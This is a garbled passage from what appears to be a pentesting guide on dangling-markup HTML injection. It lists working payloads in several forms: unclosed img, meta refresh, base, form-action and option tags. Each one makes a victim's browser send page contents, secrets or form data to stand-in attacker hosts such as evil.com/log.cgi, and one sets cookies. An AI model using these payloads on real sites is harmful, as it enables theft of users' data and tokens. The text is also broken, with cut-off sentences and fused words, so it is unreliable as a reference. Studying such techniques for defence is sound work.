<img src='http://evil.com/log.cgi?when the page is loaded the victim will send you all the code between the injected
imgtag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).
imgtag is forbidden (due to CSP for example) you can also use
<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?
@import(will send all the code until it find a ";")
<basetag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):
<form action='update_profile.php'>) will send the data to the malicious domain.
<form action='http://evil.com/log_steal'>this will overwrite the next form header and all the data from the form will be sent to the attacker.
<option>tag. All the data until a closed
</option>is found will be sent:
targetattribute inside the
basetag will contain HTML content until the next single quote. This will make that the value of
window.nameif the link is clicked is going to be all that HTML content. Therefore, as you control the page where the victim is accessing by clicking the link, you can access that
window.nameand exfiltrate that data:
meta http-equivto perform several actions like setting a Cookie:
<meta http-equiv="Set-Cookie" Content="SESSID=1">or performing a redirect (in 5s in this case):
<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />
Content-Security-Policy: default-src 'self';, or
Content-Security-Policy: http-equiv 'self';)
chrome://flags/#enable-portalsor it won't work.